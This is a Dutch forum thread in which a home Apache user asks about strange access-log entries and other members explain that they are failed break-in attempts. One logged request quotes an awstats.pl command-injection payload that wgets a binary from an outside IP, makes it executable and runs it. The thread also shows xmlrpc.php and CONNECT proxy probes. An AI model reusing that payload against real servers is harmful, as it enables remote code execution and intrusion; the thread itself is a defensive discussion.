inbraakpogingen via Personal Web Sharing??

Hoi,

Sinds kort run ik vanaf mijn mac een website mbv apache, gewoon via mijn externe ip adres en de map Sites die in je usermap zit.
Via console wilde ik kijken of ik kan zien wie er op mijn site zit te kijken
Dit kan, dan kijk ik namelijk bij de httpd access_log. Daar zie ik inderdaad heel veel ip adressen en de datum waarop ze langs zijn geweest, en daarachter dan "GET / en dan wat ze bekeken hebben, tot dan lijkt alles logisch (er staat dan bijvoorbeeld welke foto ze gedownload hebben, dat is herkenbaar voor mij)
Maar af en toe staan er ook ip adressen tussen die zegen "GET / en dan dingen die ik niet ken, bijvoorbeeld:

/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e21
8%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|

En soms staat er niet GET maar bijvoorbeeld

“POST /xmlrpc.php HTTP/1.1” 404 305

Of “POST /blog/xmlsrv/xmlrpc.php HTTP/1.1” 404 317

om maar iets te noemen. Een paar keer zelfs:

“CONNECT 168.95.5.115:25 HTTP/1.0” 405 320

Proberen deze lui op mijn computer in te breken??

Ik probeer soms deze onbekende ip adressen in mijn browser te openen, meestal geen contact, maar een keer een soort vage Japanse site, en de andere keer ook een vage Japanse site (vaag omdat ik natuurlijk geen Japans ken, maar het leek een soort game site of zo te zijn)

Is dit iets serieus of maak ik me zorgen om niets?

Dank

Dit zijn inderdaad inbraakpogingen. Ik kom ze bij mij in de logfiles ook tegen. Maar er staat altijd een 404 code achter, oftewel ze hebben niets kunnen vinden/ophalen. Bij jou is dat ook het geval, dus je hoeft je niet echt zorgen te maken.

Wel moet je ervoor zorgen dat je oplet met installeren van PHP code.
Als je iets gaat installeren op jouw Mac waardoor die URL’s wel gaan werken, dan loop je mogelijk een gevaar.

Dank voor je antwoord. Hoe kan ik weten wanneer ik een php code installeer? Hoe kun je iets installeren op je mac waardoor URL's gaan 'werken' ? Ik dacht dat URL's alleen maar adressen zijn en verder niets kunnen doen?

Een URL is een verwijzing naar iets op een server. Bijvoorbeeld een bestand op een harde schijf. Als zo'n bestand een programma is, dan kun je dat programma dus uitvoeren door de betreffende URL aan te roepen.

De “inbrekers” weten dat ze met bepaalde programma’s in staat zijn om code op een computer uit te voeren. Dus proberen ze die programma’s aan te roepen door de URL’s op jouw website los te laten.

Overigens gaat het in jouw geval niet om PHP code, maar om een Perl script dat ze proberen te draaien. Ik heb in mijn log ook gezien dat ze iets met PHP probeerden, vandaar dat ik over PHP begon.

De belangrijkste locaties om in de gaten te houden zijn in ieder geval de directories waar Apache de webstanden plaatst. Dat zijn ~/<gebruiker>/Webpagina’s, /Bibliotheek/WebServer/Documents en /Bibliotheek/WebServer/CGI-Executables. Vooral die laatste is belangrijk, want daar worden normaal gesproken de programma’s gezet die je via een URL mag aanroepen.

Dank!!!

Ik heb een paar duizend inbraak pogingen per maand via ssh op mijn linux server. Dit zijn bijna altijd scripts. Je ziet enkele tientallen tot honderden inlog pogingen vanaf een ip adres. Vaak met tussenpauze van een 10-tal seconden. Als je een met een fixed ip adres (plus domeinnaam) 24/7 online bent dan krijg je dat.

Ook met een dynamisch IP adres in combinatie met een DynDNS domein weten ze je te vinden...

Bedankt voor jullie reacties. Die scripts, betekent het dat zij die op je website / in de map Sites proberen te zetten? Of elders op je computer? En staat ergens uitgelegd wat al die getallen betekenen, ik bedoel na zo'n poging staat dan 404, wat betekent dat het niet gelukt is. Maar wat betekent bijvoorbeeld 405?

[quote:26427bee16="JanWillem"]Bedankt voor jullie reacties. Die scripts, betekent het dat zij die op je website / in de map Sites proberen te zetten? Of elders op je computer? [/quote:26427bee16] Nee, die scripts staan al op jouw computer. Althans, daar gaan zij vanuit en ze proberen nu om die scripts aan te roepen. Maar omdat ze dus in dit geval NIET op jouw computer staan lukt hun poging niet. Dat zie je dus aan die 404 error.

[quote:26427bee16=“JanWillem”]En staat ergens uitgelegd wat al die getallen betekenen, ik bedoel na zo’n poging staat dan 404, wat betekent dat het niet gelukt is. Maar wat betekent bijvoorbeeld 405?[/quote:26427bee16]
Een uitleg over de codes kun je hier vinden.